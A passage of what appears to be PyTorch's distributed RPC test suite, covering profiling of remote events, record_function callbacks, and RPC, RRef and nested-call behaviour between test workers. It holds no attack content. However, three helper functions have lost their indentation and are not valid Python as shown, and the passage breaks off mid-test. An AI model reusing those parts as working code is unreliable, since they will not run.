                remote_event_name
                for remote_event_name in remote_event_name_set
                if remote_event_name in operator_name_substr
            }
            remote_event_name_set -= matching_event

        # The set should be empty, otherwise its contained elements did
        # not show up in the remote profiler output.
        self.assertTrue(
            remote_event_name_set == set(),
            f"Expected {remote_event_name_set} to be included in remote profiler output.",
        )

    for dst in dst_ranks:
        dst_worker = worker_name(dst)
        num_parallel_rpcs = 2
        with concurrent.futures.ThreadPoolExecutor(
            max_workers=num_parallel_rpcs
        ) as executor:
            futs = [
                executor.submit(rpc_with_profiling, dst_worker)
                for _ in range(num_parallel_rpcs)
            ]
            # Wait for workers to finish test
            for fut in futs:
                fut.result()
def _run_test_profiler_remote_events_profiled(self):
    """Shared driver: profile an RPC and validate the collected remote events."""
    # Tests that we can successfully invoke the profiler on a remote node,
    # and collect the remote events back in the local profiler.
    if self.rank != 1:
        return

    dst_ranks = [rank for rank in range(0, self.world_size) if rank != self.rank]
    for dst in dst_ranks:
        dst_worker = worker_name(dst)
        with _profile() as prof:
            fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=())
            ret = fut.wait()

        events = prof.function_events

        rpc_event = get_function_event(events, RPCExecMode.ASYNC.value)
        self.check_profiling_info(
            worker_name(self.rank),
            dst_worker,
            udf_with_torch_ops,
            rpc_event,
            RPCExecMode.ASYNC,
        )

        remote_events = {event.name: event for event in events if event.is_remote}
        rpc_profiling_key = _build_rpc_profiling_key(
            RPCExecMode.ASYNC,
            udf_with_torch_ops.__qualname__,
            worker_name(self.rank),
            worker_name(dst),
        )

        for expected_remote_event_name in EXPECTED_REMOTE_EVENTS:
            expected_key = rpc_profiling_key + REMOTE_OP_STR + expected_remote_event_name
            self.assertTrue(expected_key in remote_events)
            remote_event = remote_events[expected_key]
            # Remote event should have a node ID corresponding to the worker
            # it ran on.
            self.assertEqual(remote_event.node_id, dst)

        # Validate order remote events show up in profiling output.
        def convert_remote_to_local(event_name):
            # Strip the profiling-key prefix to recover the bare op name.
            remote_op_key = rpc_profiling_key + REMOTE_OP_STR
            return event_name[
                event_name.find(remote_op_key)
                + len(remote_op_key) :
            ]

        remote_events_list = [
            convert_remote_to_local(event.name)
            for event in events
            if convert_remote_to_local(event.name) in EXPECTED_REMOTE_EVENTS
        ]
        self.assertEqual(
            set(remote_events_list),
            set(EXPECTED_REMOTE_EVENTS),
            f"Mismatch between profiled events: {set(remote_events_list)} and expected events: {set(EXPECTED_REMOTE_EVENTS)}",
        )
@dist_init
def test_profiler_remote_events_profiled(self):
    self._run_test_profiler_remote_events_profiled()

@dist_init
def test_profiler_remote_events_profiled_single_threaded(self):
    # NOTE(review): body is identical to the variant above; the
    # single-threaded behavior presumably comes from test-class/backend
    # configuration selecting which wrapper runs -- confirm.
    self._run_test_profiler_remote_events_profiled()
def run_profiling_workload(self, dst):
    """Issue one torch.mul RPC to worker `dst` and block until it completes.

    Used as the workload under profiling by the autograd-context tests.
    """
    operands = (
        torch.tensor(1.0, requires_grad=True),
        torch.tensor(1.0, requires_grad=True),
    )
    pending = rpc.rpc_async(worker_name(dst), torch.mul, args=operands)
    pending.wait()
def _run_rpc_profiling_async_function(self, device="cpu"):
    # Profiles an async function (slow_async_add) that itself issues a
    # nested RPC (dst1 -> dst2); verifies both the nested RPC event and the
    # remote add op are captured with the correct node IDs.
    if self.rank != 1:
        return

    dst1 = worker_name((self.rank + 1) % self.world_size)
    dst2 = worker_name((self.rank + 2) % self.world_size)
    x = torch.ones(2)
    y = torch.ones(2)
    with _profile() as prof:
        ret = rpc.rpc_async(
            dst1, slow_async_add, args=(dst2, x, y, device), timeout=20
        )
        out = ret.wait()

    function_events = prof.function_events
    # slow_async_add resulted in an RPC from dst1 -> dst2, so this should be
    # recorded.
    key_prefix = _build_rpc_profiling_key(
        RPCExecMode.ASYNC, slow_async_add.__qualname__, worker_name(self.rank), dst1
    )
    nested_rpc_key_prefix = _build_rpc_profiling_key(
        RPCExecMode.ASYNC, slow_add.__qualname__, dst1, dst2
    )
    expected_key = key_prefix + REMOTE_OP_STR + nested_rpc_key_prefix
    remote_events = [event for event in function_events if event.is_remote]
    rpc_remote_event = [
        event for event in remote_events if event.name == expected_key
    ]
    self.assertEqual(1, len(rpc_remote_event))
    rpc_remote_event = rpc_remote_event[0]
    # The nested RPC originated on dst1.
    self.assertEqual(rpc_remote_event.node_id, (self.rank + 1) % self.world_size)
    # slow_async_add's RPC does an add on dst2, which should be reflected as well.
    remote_add_key = (
        expected_key + REMOTE_OP_STR + torch.jit._builtins._find_builtin(torch.add)
    )
    remote_add_event = [
        event for event in remote_events if event.name == remote_add_key
    ]
    self.assertEqual(1, len(remote_add_event))
    remote_add_event = remote_add_event[0]
    # Validate that node_id is dst2.
    self.assertEqual(remote_add_event.node_id, (self.rank + 2) % self.world_size)
@dist_init
def test_rpc_profiling_async_function(self):
    # A process group is needed for the barrier separating the CPU run
    # from the CUDA run.
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    self._run_rpc_profiling_async_function()
    if torch.cuda.is_available():
        dist.barrier()
        self._run_rpc_profiling_async_function(device="cuda:0")

@dist_init
def test_rpc_profiling_async_function_single_threaded(self):
    # NOTE(review): identical body to the variant above; single-threaded
    # mode presumably comes from test-class configuration -- confirm.
    initialize_pg(self.file_init_method, self.rank, self.world_size)
    self._run_rpc_profiling_async_function()
    if torch.cuda.is_available():
        dist.barrier()
        self._run_rpc_profiling_async_function(device="cuda:0")
@dist_init
def test_rpc_profiling_remote_record_function(self):
    # test that functions run over RPC with record_function show the expected
    # profiled block.
    if self.rank != 1:
        return
    dst_ranks = [i for i in range(self.world_size) if i != self.rank]
    for dst_rank in dst_ranks:
        dst_worker = worker_name(dst_rank)
        with _profile() as prof:
            fut = rpc.rpc_async(dst_worker, udf_with_torch_ops, args=(-1, True))
            fut.wait()

        function_events = prof.function_events
        record_function_remote_event = [
            evt for evt in function_events if "##forward##" in evt.name
        ]
        self.assertEqual(1, len(record_function_remote_event))
        record_function_remote_event = record_function_remote_event[0]
        self.assertEqual(record_function_remote_event.node_id, dst_rank)

        # cpu_children only returns direct children, so here we get all
        # children recursively.
        def get_cpu_children(event):
            # FIX: the original aliased `event.cpu_children` and extended
            # that same list while iterating it. That (a) permanently
            # mutated the profiler event in place and (b) iterated over
            # elements appended mid-loop, re-visiting grandchildren and
            # producing duplicates at nesting depth >= 3. Build a fresh
            # list instead; the set of descendants is unchanged.
            descendants = []
            for child in event.cpu_children:
                descendants.append(child)
                descendants.extend(get_cpu_children(child))
            return descendants

        remote_children = get_cpu_children(record_function_remote_event)
        # Get local children and verify parity.
        with _profile() as prof:
            udf_with_torch_ops(-1, True)
        local_function_events = prof.function_events
        local_record_function_event = [
            evt for evt in local_function_events if "##forward##" in evt.name
        ][0]
        local_children = get_cpu_children(local_record_function_event)
        local_children_names = [
            evt.name for evt in local_children
        ]

        # Local marker prefixed to remote op names (shadows the module-level
        # constant of the same name on purpose).
        REMOTE_OP_STR = "#remote_op: "

        def convert_remote_to_local(event_name):
            # Strip the remote-op marker to recover the plain op name.
            remote_op_key = REMOTE_OP_STR
            return event_name[
                event_name.find(remote_op_key) + len(remote_op_key) :
            ]

        # Every op profiled under the remote record_function block must also
        # appear under the local record_function block.
        for evt in remote_children:
            local_name = convert_remote_to_local(evt.name)
            self.assertTrue(local_name in local_children_names)
def validate_profiling_workload(self, dst, prof):
    # Verifies that run_profiling_workload's torch.mul was captured by
    # `prof` as a remote event attributed to rank `dst`.

    def convert_remote_to_local(event_name):
        # Strip everything up to and including the remote-op marker.
        return event_name[event_name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR) :]

    events = prof.function_events
    remote_events = {
        convert_remote_to_local(event.name): event
        for event in events
        if event.is_remote
    }
    self.assertTrue("aten::mul" in remote_events)
    remote_mul_event = remote_events["aten::mul"]
    self.assertEqual(remote_mul_event.node_id, dst)
    self.check_profiling_info(
        worker_name(self.rank),
        worker_name(dst),
        torch.mul,
        remote_mul_event,
        RPCExecMode.ASYNC,
    )
def _run_test_profiler_with_autograd_context(self):
    # Profiling must work regardless of the nesting order of the profiler
    # and the distributed autograd context managers.
    dst = (self.rank + 1) % self.world_size
    if self.rank == 1:
        # Cases where we can double wrap messages with profiling information and autograd info.
        with dist_autograd.context() as context_id:
            with _profile() as prof:
                self.run_profiling_workload(dst)

        self.validate_profiling_workload(dst, prof)

        # Ensure that flipped order of ctx managers results in events being
        # recorded as expected.
        with _profile() as prof:
            with dist_autograd.context() as context_id:
                self.run_profiling_workload(dst)

        self.validate_profiling_workload(dst, prof)

@dist_init
def test_profiler_with_autograd_context_single_threaded(self):
    self._run_test_profiler_with_autograd_context()

@dist_init
def test_profiler_with_autograd_context(self):
    self._run_test_profiler_with_autograd_context()
def _profiler_test_with_rpc(self, rpc_exec_mode, func, args, use_record_function=False, dst=None):
    # Shared driver: runs `func` over RPC in the given exec mode under the
    # profiler and validates the recorded local and remote events.
    # `use_record_function` additionally wraps the call in a "foo" scope
    # and checks event nesting/order.
    dst = dst if dst is not None else (self.rank + 1) % self.world_size

    # only run profiler on rank 1.
    if self.rank == 1:
        with _profile() as prof:
            record_function_ctx_mgr = (
                contextlib.suppress()
                if not use_record_function
                else torch.autograd.profiler.record_function(
                    "foo"
                )
            )
            with record_function_ctx_mgr as rf:
                if rpc_exec_mode == RPCExecMode.SYNC:
                    rpc.rpc_sync(worker_name(dst), func, args=args)
                elif rpc_exec_mode == RPCExecMode.ASYNC:
                    fut = rpc.rpc_async(worker_name(dst), func, args=args)
                    fut.wait()
                else:
                    self.assertTrue(rpc_exec_mode == RPCExecMode.REMOTE)
                    rref = rpc.remote(worker_name(dst), func, args=args)
                    rref.to_here()
                    # To avoid flakiness, wait for the RRef to be profiled. This
                    # means that we received the acknowledgement of successful
                    # creation on the owner and ran the callbacks responsible
                    # for recording the profiling event.
                    rref._get_profiling_future().wait()

        events = prof.function_events
        rpc_event = get_function_event(events, rpc_exec_mode.value)
        # verify Node ID for this rpc event.
        self.assertEqual(rpc_event.node_id, self.rank)
        # Ensure recording of remote events.
        remote_events = {event for event in events if event.node_id == dst} - {rpc_event}
        self.assertGreaterEqual(len(remote_events), 1)
        for remote_event in remote_events:
            self.assertEqual(remote_event.node_id, dst)

        if use_record_function:
            scope_event = get_function_event(events, "foo")
            # Since RPC call is within the scope, its CPU interval should be
            # contained within foo's interval.
            self.assertLessEqual(scope_event.time_range.start, rpc_event.time_range.start)
            self.assertGreaterEqual(scope_event.time_range.end, rpc_event.time_range.end)
        # the sender, dest worker, function run, and type of RPC should all
        # be recorded.
        self_worker_name = worker_name(self.rank)
        dst_worker_name = worker_name(dst)
        self.check_profiling_info(self_worker_name, dst_worker_name, func, rpc_event, rpc_exec_mode)
        if use_record_function:
            # verify order by ensuring that the outer context comes
            # before the rpc event.
            foo_event_ix = next(i for i, event in enumerate(events) if "foo" in event.name)
            rpc_event_idx = next(i for i, event in enumerate(events) if rpc_exec_mode.value in event.name)
            self.assertLess(foo_event_ix, rpc_event_idx)
def _run_test_profiler_with_sync_rpc_udf(self):
    # Sync RPC of a Python UDF, with and without a record_function scope.
    self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,))
    self._profiler_test_with_rpc(RPCExecMode.SYNC, my_sleep_func, args=(1,),
                                 use_record_function=True)

@dist_init
def test_profiler_with_sync_rpc_udf(self):
    self._run_test_profiler_with_sync_rpc_udf()

@dist_init
def test_profiler_with_sync_rpc_udf_single_threaded(self):
    self._run_test_profiler_with_sync_rpc_udf()

def _run_test_profiler_with_sync_rpc_builtin(self):
    # Sync RPC of a builtin op, with and without a record_function scope.
    self._profiler_test_with_rpc(
        RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
    )
    self._profiler_test_with_rpc(
        RPCExecMode.SYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
        use_record_function=True
    )

@dist_init
def test_profiler_with_sync_rpc_builtin(self):
    self._run_test_profiler_with_sync_rpc_builtin()

@dist_init
def test_profiler_with_sync_rpc_builtin_single_threaded(self):
    self._run_test_profiler_with_sync_rpc_builtin()

def _run_test_profiler_with_async_rpc_udf(self):
    # Async RPC of a Python UDF, with and without a record_function scope.
    self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,))
    self._profiler_test_with_rpc(RPCExecMode.ASYNC, my_sleep_func, args=(1,),
                                 use_record_function=True)

@dist_init
def test_profiler_with_async_rpc_udf(self):
    self._run_test_profiler_with_async_rpc_udf()

@dist_init
def test_profiler_with_async_rpc_udf_single_threaded(self):
    self._run_test_profiler_with_async_rpc_udf()

def _run_test_profiler_with_async_rpc_builtin(self):
    # Async RPC of a builtin op, with and without a record_function scope.
    self._profiler_test_with_rpc(
        RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1))
    )
    self._profiler_test_with_rpc(
        RPCExecMode.ASYNC, torch.mul, args=(torch.ones(1), torch.ones(1)),
        use_record_function=True
    )

@dist_init
def test_profiler_with_async_rpc_builtin(self):
    self._run_test_profiler_with_async_rpc_builtin()

@dist_init
def test_profiler_with_async_rpc_builtin_single_threaded(self):
    self._run_test_profiler_with_async_rpc_builtin()
def _run_test_profiler_with_remote_udf(self):
    # rpc.remote() of a Python UDF: plain, inside record_function, and to self.
    self._profiler_test_with_rpc(RPCExecMode.REMOTE, my_sleep_func, args=(1,))
    self._profiler_test_with_rpc(
        RPCExecMode.REMOTE, my_sleep_func, args=(1,), use_record_function=True
    )
    # test remote to self
    self._profiler_test_with_rpc(
        RPCExecMode.REMOTE, my_sleep_func, args=(1,), dst=self.rank
    )

@dist_init
def test_profiler_with_remote_udf(self):
    self._run_test_profiler_with_remote_udf()

@dist_init
def test_profiler_with_remote_udf_single_threaded(self):
    self._run_test_profiler_with_remote_udf()

def _run_test_profiler_with_remote_builtin(self):
    # rpc.remote() of a builtin op: plain, inside record_function, and to self.
    self._profiler_test_with_rpc(
        RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1))
    )
    self._profiler_test_with_rpc(
        RPCExecMode.REMOTE, torch.mul, args=(torch.ones(1), torch.ones(1)),
        use_record_function=True
    )
    # test remote to self
    self._profiler_test_with_rpc(
        RPCExecMode.REMOTE,
        torch.mul,
        args=(torch.ones(1), torch.ones(1)),
        dst=self.rank,
    )

@dist_init
def test_profiler_with_remote_builtin(self):
    self._run_test_profiler_with_remote_builtin()

@dist_init
def test_profiler_with_remote_builtin_single_threaded(self):
    self._run_test_profiler_with_remote_builtin()

def _run_test_profiler_with_script_async_rpc(self):
    # Async RPC of a TorchScript function, with and without record_function.
    self._profiler_test_with_rpc(
        RPCExecMode.ASYNC, my_script_func, args=(torch.tensor(1),)
    )
    self._profiler_test_with_rpc(
        RPCExecMode.ASYNC,
        my_script_func,
        args=(torch.tensor(1),),
        use_record_function=True,
    )

@dist_init
def test_profiler_with_script_async_rpc(self):
    self._run_test_profiler_with_script_async_rpc()

@dist_init
def test_profiler_with_script_async_rpc_single_threaded(self):
    self._run_test_profiler_with_script_async_rpc()

def _run_test_profiler_with_script_sync_rpc(self):
    # Sync RPC of a TorchScript function, with and without record_function.
    self._profiler_test_with_rpc(
        RPCExecMode.SYNC, my_script_func, args=(torch.tensor(1),)
    )
    self._profiler_test_with_rpc(
        RPCExecMode.SYNC,
        my_script_func,
        args=(torch.tensor(1),),
        use_record_function=True,
    )

@dist_init
def test_profiler_with_script_sync_rpc(self):
    self._run_test_profiler_with_script_sync_rpc()

@dist_init
def test_profiler_with_script_sync_rpc_single_threaded(self):
    self._run_test_profiler_with_script_sync_rpc()

def _run_test_profiler_with_script_remote_rpc(self):
    # rpc.remote() of a TorchScript function: plain, in record_function, to self.
    self._profiler_test_with_rpc(
        RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),)
    )
    self._profiler_test_with_rpc(
        RPCExecMode.REMOTE,
        my_script_func,
        args=(torch.tensor(1),),
        use_record_function=True,
    )
    # test remote to self
    self._profiler_test_with_rpc(
        RPCExecMode.REMOTE, my_script_func, args=(torch.tensor(1),), dst=self.rank
    )

@dist_init
def test_profiler_with_script_remote_rpc(self):
    self._run_test_profiler_with_script_remote_rpc()

@dist_init
def test_profiler_with_script_remote_rpc_single_threaded(self):
    self._run_test_profiler_with_script_remote_rpc()
def _assert_top_level_events(self, process_global_events, expected_top_level_event_names):
top_level_event_names = []
for thread_local_events in process_global_events:
# Get top-level events from all events happened on a thread.
last_end_time = 0
for event in thread_local_events:
event_name = event.name
time_range = event.time_range
if time_range.start > last_end_time:
top_level_event_names.append(event_name)
last_end_time = time_range.end
top_level_event_names = sorted(top_level_event_names)
expected_top_level_event_names = sorted(expected_top_level_event_names)
self.assertEqual(
top_level_event_names,
expected_top_level_event_names,
f"Expected events {expected_top_level_event_names}, but got {top_level_event_names}",
)
@dist_init
def test_server_process_global_profiler(self):
    # Nested server-side (process-global) profilers: the inner one sees only
    # the sub op, the outer one sees both add and sub.
    if self.rank != 0:
        return

    dst_rank = (self.rank + 1) % self.world_size
    dst_worker_name = worker_name(dst_rank)

    x = torch.tensor(1)
    y = torch.tensor(2)

    # Enter the profilers remotely via their RRefs (no `with` on this side).
    outer_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
    outer_profile_rref.rpc_sync().__enter__()
    rpc.rpc_sync(dst_worker_name, torch.add, (x, y))
    inner_profile_rref = rpc.remote(dst_worker_name, rpc._server_process_global_profile)
    inner_profile_rref.rpc_sync().__enter__()
    rpc.rpc_sync(dst_worker_name, torch.sub, (x, y))
    inner_profile_rref.rpc_sync().__exit__(None, None, None)
    outer_profile_rref.rpc_sync().__exit__(None, None, None)

    inner_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (inner_profile_rref,))
    expected_inner_events = ['aten::sub']
    expected_outer_events = expected_inner_events + ['aten::add']

    self._assert_top_level_events(inner_events, expected_inner_events)
    outer_events = rpc.rpc_sync(dst_worker_name, get_events_from_profile, (outer_profile_rref,))
    self._assert_top_level_events(outer_events, expected_outer_events)

    # Smoke-check that aggregation works on both profiles.
    inner_profile_rref.rpc_sync().key_averages()
    outer_profile_rref.rpc_sync().key_averages()
@dist_init
def test_async_record_function_double_end_callbacks(self):
    # _call_end_callbacks_on_future must reject a second invocation on the
    # same record_function scope.
    num_sleep_seconds = 1
    if self.rank == 1:
        # Validate that calling the function twice results in an error.
        with _profile() as pf:
            with torch.autograd.profiler.record_function("foo") as rf:
                fut = rpc.rpc_async(
                    worker_name(0), my_sleep_func, args=(num_sleep_seconds,)
                )
                rf._call_end_callbacks_on_future(fut)
                with self.assertRaisesRegex(
                    RuntimeError, "can only be called once."
                ):
                    rf._call_end_callbacks_on_future(fut)
            fut.wait()
@dist_init
def test_async_record_function_cbs_jit_call(self):
    # Exercises the JIT path of record_function end-callbacks: the profiling
    # future must pass through the RPC future's value unchanged.
    if self.rank == 1:
        with _profile() as pf:
            key = _build_rpc_profiling_key(
                RPCExecMode.ASYNC,
                torch._jit_internal._qualified_name(my_script_func),
                "worker1",
                "worker0",
            )
            with torch.autograd.profiler.record_function(key) as rf:
                fut = rpc.rpc_async(
                    worker_name(0), my_script_func, args=(torch.tensor(1),)
                )
                # Intentionally calling record_function internals
                fut = torch.ops.profiler._call_end_callbacks_on_jit_fut(rf.handle, fut)
            result = fut.wait()
            # Validate that the profiling future returns the same value as the RPC
            # future.
            expected = torch.add(torch.tensor(1), torch.tensor(1))
            self.assertEqual(result, expected)
        events = pf.function_events
        rpc_event = get_function_event(
            events, torch._jit_internal._qualified_name(my_script_func)
        )
        self.assertTrue(torch._jit_internal._qualified_name(my_script_func) in rpc_event.name)
@dist_init
def test_py_class_constructor(self):
    """A class constructor invoked over RPC yields an instance with the right state."""
    n = self.rank + 1
    dst_rank = n % self.world_size
    instance = rpc.rpc_sync(worker_name(dst_rank), MyClass, args=(n,))
    self.assertEqual(instance.a, n)

@dist_init
def test_py_class_instance_method(self):
    """A bound instance method can be the target of an RPC."""
    n = self.rank + 1
    dst_rank = n % self.world_size
    remote_result = rpc.rpc_sync(
        worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
    )
    local_result = MyClass(2).my_instance_method(n)
    self.assertEqual(remote_result, local_result)

@dist_init
def test_py_class_method(self):
    """A classmethod can be the target of an RPC."""
    n = self.rank + 1
    dst_rank = n % self.world_size
    remote_result = rpc.rpc_sync(
        worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
    )
    self.assertEqual(remote_result, MyClass.my_class_method(n, n + 1))

@dist_init
def test_py_class_static_method(self):
    """A staticmethod can be the target of an RPC."""
    n = self.rank + 1
    dst_rank = n % self.world_size
    remote_result = rpc.rpc_sync(
        worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
    )
    self.assertEqual(remote_result, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
    """Two concurrent async RPCs to the same worker both return correct results."""
    n = self.rank + 1
    dst_rank = n % self.world_size
    dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
    pending = [
        rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,)),
        rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2)),
    ]
    self.assertEqual(pending[0].wait(), MyClass.my_static_method(n + 10))
    self.assertEqual(pending[1].wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
    # An RPC to a function with no return value yields the same result as a
    # local call (None, per no_result's definition elsewhere in this file).
    n = self.rank + 1
    dst_rank = n % self.world_size
    ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
    self.assertEqual(ret, no_result())

@dist_init
def test_py_tensors(self):
    # Tensor arguments and tensor results round-trip through a sync RPC.
    n = self.rank + 1
    dst_rank = n % self.world_size
    ret = rpc.rpc_sync(
        worker_name(dst_rank),
        my_tensor_function,
        args=(torch.ones(n, n), torch.ones(n, n)),
    )
    self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
    # Fires 100 async RPCs with tensors of increasing size and verifies each
    # result against the local computation for the same index.
    futs = []
    n = self.rank + 1
    dst_rank = n % self.world_size
    for i in range(100):
        fut = rpc.rpc_async(
            worker_name(dst_rank),
            my_tensor_function,
            args=(torch.ones(i, i), torch.ones(i, i)),
        )
        futs.append(fut)

    # enumerate() replaces the original's manually-incremented `j` counter,
    # pairing each result with its launch index directly.
    for j, val in enumerate(torch.futures.wait_all(futs)):
        self.assertEqual(
            val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
        )
@dist_init
def test_py_tensors_in_container(self):
    # Tensors nested inside lists, custom classes, and dicts all serialize
    # correctly through an RPC.
    n = self.rank + 1
    dst_rank = n % self.world_size
    a = [torch.ones(n, n), torch.ones(n, n)]
    b = TensorClass(build_complex_tensors())
    c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
    ret = rpc.rpc_sync(
        worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
    )
    self.assertEqual(ret, my_complex_tensor_function(a, b, c))

@dist_init
def test_py_nested_pickle(self):
    # A custom-pickled object containing tensors survives the RPC round trip.
    n = self.rank + 1
    dst_rank = n % self.world_size

    ret = rpc.rpc_sync(
        worker_name(dst_rank),
        run_nested_pickle,
        args=(MyPickleClass(), torch.ones(2, 2)),
    )

    m = MyPickleClass()
    m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
    self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
    # Passing an unexpected argument raises the remote TypeError locally.
    n = self.rank + 1
    dst_rank = n % self.world_size
    with self.assertRaises(TypeError):
        ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))

@dist_init
def test_py_raise_in_user_func(self):
    # A user-function exception propagates through the future AND is logged
    # to stderr on the worker that ran it.
    with captured_output() as (_, err):
        # This barrier prevents a race condition where the main thread has
        # not entered the context manager when the remote function runs.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        n = self.rank + 1
        dst_rank = n % self.world_size
        fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
        with self.assertRaisesRegex(ValueError, expected_err):
            fut.wait()
        # This barrier prevents a race condition where the main thread exits
        # context manager before the remote function has ran.
        dist.barrier()

    # Validate that trainers log errors when running functions.
    stderr_lines = err.getvalue()
    self.assertTrue(expected_err in stderr_lines)

@dist_init
def test_py_raise_in_user_func_escaped_str(self):
    # Remote error strings with escape sequences are unescaped locally.
    n = self.rank + 1
    dst_rank = n % self.world_size
    fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
    try:
        fut.wait()
    except ValueError as e:
        msg = str(e)
        # Ensure newlines are unescaped to provide a better repr of error.
        self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
    else:
        self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
    # An RPC target that itself performs an RPC returns the combined result.
    self._nested_rpc(nested_rpc, torch.ones(2, 2) + 1)

@dist_init
def test_stress_light_rpc(self):
    self._stress_test_rpc(light_rpc)

@dist_init
def test_stress_heavy_rpc(self):
    # Stress with large tensor payloads.
    self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))

@dist_init
def test_stress_heavy_rpc_torchscript(self):
    # Same stress workload, TorchScript entry point.
    self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))

@dist_init
def test_builtin_remote_ret(self):
    self._builtin_remote_ret(
        torch.ones(2, 2),
        torch.ones(2, 2),
        torch.ones(2, 2) * 2
    )

@dist_init
def test_builtin_remote_self(self):
    self._builtin_remote_self(
        torch.ones(2, 2),
        torch.ones(2, 2),
        torch.ones(2, 2) * 2
    )
@staticmethod
def _multi_args_fn(n, sparse=False):
if sparse:
return (build_sparse_tensor(), build_sparse_tensor())
else:
return (torch.ones(n, n), torch.ones(n, n))
@dist_init
def test_multi_builtin_remote_ret(self):
    # Dense (sparse=False) variant of the multi-remote builtin test.
    self._test_multi_remote_call(
        torch.add, False,
        args_fn=RpcTest._multi_args_fn
    )

@dist_init
def test_py_udf_remote(self):
    # rpc.remote with kwargs-only invocation of a Python UDF.
    n = self.rank + 1
    dst_rank = n % self.world_size
    rref = rpc.remote(
        worker_name(dst_rank),
        my_function,
        kwargs={"a": n, "b": n + 1, "c": n + 2},
    )
    self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@staticmethod
def _multi_kwargs_fn(n, sparse=False):
if sparse:
return {
"a": build_sparse_tensor(),
"b": build_sparse_tensor(),
"c": build_sparse_tensor()
}
else:
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
@dist_init
def test_multi_py_udf_remote(self):
    # Dense (sparse=False) variant of the multi-remote UDF test, passing
    # arguments as kwargs.
    self._test_multi_remote_call(
        my_function,
        False,
        kwargs_fn=RpcTest._multi_kwargs_fn
    )
@dist_init
def test_py_rref_args(self):
    # RRefs as positional args to an RPC.
    self._py_rref_args(
        torch.ones(2, 2),
        1,
        torch.ones(2, 2),
        2,
        torch.ones(2, 2) * 2 + 3)

@dist_init
def test_py_rref_args_user_share(self):
    # User-created RRefs shared across workers as args.
    self._py_rref_args_user_share(
        torch.ones(2, 2),
        1,
        2,
        torch.ones(2, 2),
        3,
        4,
        torch.ones(2, 2) * 2 + 10
    )

@dist_init
def test_py_rpc_rref_args(self):
    self._py_rpc_rref_args(
        torch.ones(2, 2),
        1,
        2,
        torch.ones(2, 2),
        3,
        4,
        torch.ones(2, 2) * 2 + 10
    )

@dist_init
def test_nested_remote(self):
    # rpc.remote whose target itself calls rpc.remote.
    self._nested_remote(
        nested_remote,
        torch.ones(2, 2) + 3
    )

@dist_init
def test_nested_rref(self):
    self._nested_rref(
        nested_rref,
        torch.ones(2, 2) + 1,
        torch.ones(2, 2) + 2
    )

@dist_init
def test_nested_rref_stress(self):
    self._nested_rref_stress(
        nested_rref,
        torch.ones(2, 2) + 1,
        torch.ones(2, 2) + 2
    )

@dist_init
def test_multi_layer_nested_async_rpc(self):
    # This test will exit right away, but there will be a chain of async
    # RPCs. The termination algorithm should detect those messages properly.
    # Otherwise, some peer could exit early, leaving others to timeout
    # errors or connection closed errors.
    ttl = 20
    n = self.rank + 1
    dst_rank = n % self.world_size

    multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
    # Exceptions raised while materializing a remote value surface at
    # to_here(), for both other-worker and self-targeted RRefs.
    n = self.rank + 1
    dst_rank = n % self.world_size
    # check ref to other workers
    rref = rpc.remote(worker_name(dst_rank), raise_func)
    with self.assertRaises(ValueError):
        rref.to_here()
    # check ref to itself
    rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
    with self.assertRaises(TypeError):
        rref.to_here()

@dist_init
def test_rpc_return_rref(self):
    # An RPC may return an RRef owned by a third worker.
    n = self.rank + 1
    dst_rank1 = n % self.world_size
    dst_rank2 = (n + 1) % self.world_size
    rref = rpc.rpc_sync(
        worker_name(dst_rank1),
        rpc_return_rref,
        args=(worker_name(dst_rank2),),
    )
    self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)

@dist_init
def test_rref_forward_chain(self):
    # Forward an RRef through a chain of `ttl` workers; each hop wraps it
    # in a single-element list, so unwrap `ttl` times.
    ttl = 8
    n = self.rank + 1
    dst_rank = n % self.world_size

    rref = rpc.remote(
        worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
    )

    ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)

    for i in range(ttl):
        self.assertEqual(len(ret_rref), 1)
        ret_rref = ret_rref[0].to_here()

    ret = ret_rref
